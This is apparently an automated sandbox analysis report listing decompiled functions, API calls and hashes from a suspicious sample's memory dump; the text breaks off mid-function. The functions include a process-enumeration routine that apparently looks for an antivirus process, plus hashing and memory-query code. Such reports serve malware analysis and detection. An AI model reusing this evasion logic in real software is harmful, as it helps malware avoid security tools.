String ID:
API String ID: 3298025750-0
Opcode ID: 463425da9bf90596e1ca77dfcda90db0f844c9c753842f837e43a92c303d1481
Instruction ID: cead3bcecc94edbe35fda0e8114184573718cfa3a1178494b534248aa9a37a27
Opcode Fuzzy Hash: 463425da9bf90596e1ca77dfcda90db0f844c9c753842f837e43a92c303d1481
Instruction Fuzzy Hash: 73014B32104649FBCF22DF58CC01FEA7BE5EF15750F448159FA199A160D7318920DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BA3651, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00BA3651(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x00ba3651
0x00ba365e
0x00ba365f
0x00ba3660
0x00ba3667
0x00ba3695
0x00ba3696
0x00ba3699
0x00ba369f
0x00000000
0x00000000
0x00ba367e
0x00ba3688
0x00ba368f
0x00000000
0x00ba3680
0x00ba3683
0x00ba36a3
0x00ba3685
0x00ba3685
0x00000000
0x00ba3685
0x00ba3683
0x00ba36aa
0x00ba36b0
0x00ba36b0
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 00BA3699

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 0b4a5a5ff7c9a0068d4fa0e5f8798b1e0295f23104436a596b177b16d0969e3f
Instruction ID: 3f7d7deedc519c265cc31a842ad007ee915aa2961be6168222be644ab02093fa
Opcode Fuzzy Hash: 0b4a5a5ff7c9a0068d4fa0e5f8798b1e0295f23104436a596b177b16d0969e3f
Instruction Fuzzy Hash: ACF0C475D09218FBDB10DB98C888AEDB7F8EF0A704F1480AAE502A7240D7B46B84DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00BA5931, Relevance: 1.3, APIs: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00BA4D4E,?,?,00BA6967,3D00BAC0,80000002,00BA4D4E,00BA2227,74666F53,4D4C4B48,00BA2227,?,3D00BAC0,80000002,00BA4D4E,?), ref: 00BA5951

Part of subcall function 00BA11D7: SysAllocString.OLEAUT32(00BA2227), ref: 00BA11F0
Part of subcall function 00BA11D7: SysFreeString.OLEAUT32(00000000), ref: 00BA1231

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: a4757b8bc520e9836aad19578de4368477f01626cc77e3510b4900dcd14c6c45
Instruction ID: 215cd457d0f731b63b1d97d8ce94b5f86aa6d484f87ceb5b6014159b15c6a25b
Opcode Fuzzy Hash: a4757b8bc520e9836aad19578de4368477f01626cc77e3510b4900dcd14c6c45
Instruction Fuzzy Hash: 82E0AE3200810EFFCF129F80DC46EAB3FAAFB09354F148055FA1519021CB329A74EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BA315A, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BA315A(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E00BA69C1(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E00BA677C(_a4);
				}
				return _t13;
			}

0x00ba3166
0x00ba316b
0x00ba316f
0x00ba3176
0x00ba3181
0x00ba3185
0x00ba3185
0x00ba318e

APIs

Part of subcall function 00BA69C1: memcpy.NTDLL(00000000,00000090,00000002,00000002,00BA28D0,00000008,00BA28D0,00BA28D0,?,00BA94B3,00BA28D0), ref: 00BA69F7
Part of subcall function 00BA69C1: memset.NTDLL ref: 00BA6A6C
Part of subcall function 00BA69C1: memset.NTDLL ref: 00BA6A80

memcpy.NTDLL(00000002,00BA28D0,00000000,00000002,00BA28D0,00BA28D0,00BA28D0,?,00BA94B3,00BA28D0,?,00BA28D0,00000002,?,?,00BA50A1), ref: 00BA3176

Part of subcall function 00BA677C: HeapFree.KERNEL32(00000000,00000000,00BA9161,00000000,?,?,00000000), ref: 00BA6788

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: 19ede30670193b995c5d5db20b1a4b6792fa3a521838883ea8051f015e3fd0f2
Instruction ID: 6950c89865ecc97ad0f2ab56773c84ffc85727862fba9be2a6bd00f5d0edbad0
Opcode Fuzzy Hash: 19ede30670193b995c5d5db20b1a4b6792fa3a521838883ea8051f015e3fd0f2
Instruction Fuzzy Hash: 90E086764081187BC7122A94DC01DEF7F9CDF567D1F044055FE0856111D632CA10A7E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00BA244A, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00BA244A() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xbad2a4; // 0x44fa5a8
						_t2 = _t9 + 0xbaee48; // 0x73617661
						_push( &_v264);
						if( *0xbad0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00ba2455
0x00ba245f
0x00ba2463
0x00ba246d
0x00ba249e
0x00ba2474
0x00ba2479
0x00ba2486
0x00ba248f
0x00ba24a6
0x00ba2491
0x00ba2499
0x00000000
0x00ba2499
0x00ba24a7
0x00ba24a8
0x00000000
0x00ba24a8
0x00000000
0x00ba24a2
0x00ba24ae
0x00ba24b3

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BA245A
Process32First.KERNEL32(00000000,?), ref: 00BA246D
Process32Next.KERNEL32(00000000,?), ref: 00BA2499
CloseHandle.KERNEL32(00000000), ref: 00BA24A8

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 7cb240e782339256206cb9bf1b21c6eba5bc88fb630dc8292630bf3acfa38db7
Instruction ID: 598208f25e879e62b6b62ac978e3ec796d6f5171bb4110b7fdb08327708d5c89
Opcode Fuzzy Hash: 7cb240e782339256206cb9bf1b21c6eba5bc88fb630dc8292630bf3acfa38db7
Instruction Fuzzy Hash: 79F0BB726041149AD730A76ACC8ADEF77ECDFCB710F0501E1FA55D3101EE24C98686B6

Uniqueness

Uniqueness Score: -1.00%

Function 00381799, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00381799() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x384130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x38413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x38412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x384128 = _t5;
						 *0x384130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x384124 = _t6;
						if(_t6 == 0) {
							 *0x384124 =  *0x384124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x0038179a
0x003817a8
0x003817ae
0x003817b5
0x0038180c
0x0038180c
0x003817b7
0x003817bf
0x003817cc
0x003817cc
0x00381808
0x0038180a
0x00000000
0x00000000
0x00000000
0x003817c1
0x003817c8
0x003817ce
0x003817ce
0x003817d3
0x003817e1
0x003817e6
0x003817ec
0x003817f2
0x003817f9
0x003817fb
0x003817fb
0x00381805
0x003817ca
0x003817ca
0x00000000
0x003817ca
0x003817c8

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,003819D3), ref: 003817A8
GetVersion.KERNEL32(?,003819D3), ref: 003817B7
GetCurrentProcessId.KERNEL32(?,003819D3), ref: 003817D3
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,003819D3), ref: 003817EC

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 391e80cae5a0cbf6d8aadabf8081f057828d42c109a0b48addfb500e397c8e31
Instruction ID: f0641ef272bafbbfa7c41388a44ef6a4d0c45bc84471f5205bb5302562e8e12d
Opcode Fuzzy Hash: 391e80cae5a0cbf6d8aadabf8081f057828d42c109a0b48addfb500e397c8e31
Instruction Fuzzy Hash: 73F062716803229BD713AB78BC0E7543BACA755F12F1101D9F542C66E4F77089828B58

Uniqueness

Uniqueness Score: -1.00%

Function 00BA99FC, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E00BA99FC(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x00ba99ff
0x00ba9a0a
0x00ba9a0d
0x00ba9a10
0x00ba9a11
0x00ba9a2f
0x00ba9a31
0x00ba9a34
0x00ba9a37
0x00ba9a37
0x00ba9a3a
0x00ba9a3a
0x00ba9a3d
0x00ba9a3d
0x00ba9a40
0x00ba9a40
0x00ba9a5d
0x00ba9a60
0x00ba9a76
0x00ba9a79
0x00ba9a93
0x00ba9a96
0x00ba9aac
0x00ba9aaf
0x00ba9ab1
0x00ba9ac9
0x00ba9acc
0x00ba9acf
0x00ba9ae7
0x00ba9aea
0x00ba9b04
0x00ba9b07
0x00ba9b1d
0x00ba9b20
0x00ba9b22
0x00ba9b3a
0x00ba9b3f
0x00ba9b42
0x00ba9b58
0x00ba9b5b
0x00ba9b75
0x00ba9b78
0x00ba9b8e
0x00ba9b91
0x00ba9b93
0x00ba9bae
0x00ba9bb1
0x00ba9bc8
0x00ba9bcb
0x00ba9bcf
0x00ba9be8
0x00ba9beb
0x00ba9bed
0x00ba9bf0
0x00ba9c0b
0x00ba9c0e
0x00ba9c27
0x00ba9c2a
0x00ba9c3a
0x00ba9c3d
0x00ba9c55
0x00ba9c58
0x00ba9c72
0x00ba9c75
0x00ba9c8d
0x00ba9c90
0x00ba9ca6
0x00ba9ca9
0x00ba9cc1
0x00ba9cc4
0x00ba9cdc
0x00ba9cdf
0x00ba9cf9
0x00ba9cfc
0x00ba9d12
0x00ba9d15
0x00ba9d2d
0x00ba9d30
0x00ba9d4a
0x00ba9d4d
0x00ba9d65
0x00ba9d68
0x00ba9d7e
0x00ba9d81
0x00ba9d99
0x00ba9d9c
0x00ba9db4
0x00ba9db7
0x00ba9dc9
0x00ba9dcc
0x00ba9dde
0x00ba9de1
0x00ba9df3
0x00ba9df6
0x00ba9dfa
0x00ba9e0a
0x00ba9e0d
0x00ba9e1b
0x00ba9e1e
0x00ba9e30
0x00ba9e33
0x00ba9e47
0x00ba9e4a
0x00ba9e4c
0x00ba9e5c
0x00ba9e5f
0x00ba9e71
0x00ba9e74
0x00ba9e82
0x00ba9e85
0x00ba9e97
0x00ba9e9a
0x00ba9e9e
0x00ba9eae
0x00ba9eb1
0x00ba9ec3
0x00ba9ec6
0x00ba9ed4
0x00ba9ed7
0x00ba9ee9
0x00ba9eec
0x00ba9efe
0x00ba9f01
0x00ba9f15
0x00ba9f18
0x00ba9f2c
0x00ba9f2f
0x00ba9f43
0x00ba9f46
0x00ba9f5a
0x00ba9f5d
0x00ba9f71
0x00ba9f74
0x00ba9f88
0x00ba9f8d
0x00ba9f9f
0x00ba9fa2
0x00ba9fb6
0x00ba9fb9
0x00ba9fcd
0x00ba9fd0
0x00ba9fe6
0x00ba9fe9
0x00ba9ffd
0x00baa000
0x00baa012
0x00baa015
0x00baa029
0x00baa02c
0x00baa040
0x00baa043
0x00baa057
0x00baa060
0x00baa063
0x00baa06c
0x00baa075
0x00baa07d
0x00baa085
0x00baa08f
0x00baa0a4

APIs

memset.NTDLL ref: 00BAA098

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 50e1001d6c2c4e3c59974a9fb3ff68b46dee939a17525b2316b9db9958cb51ed
Instruction ID: a17c8f421034dde425a3c163a088c905c5b4311e26400cd61435e239713b598d
Opcode Fuzzy Hash: 50e1001d6c2c4e3c59974a9fb3ff68b46dee939a17525b2316b9db9958cb51ed
Instruction Fuzzy Hash: 0C22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 003822E5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003822E5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x384178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
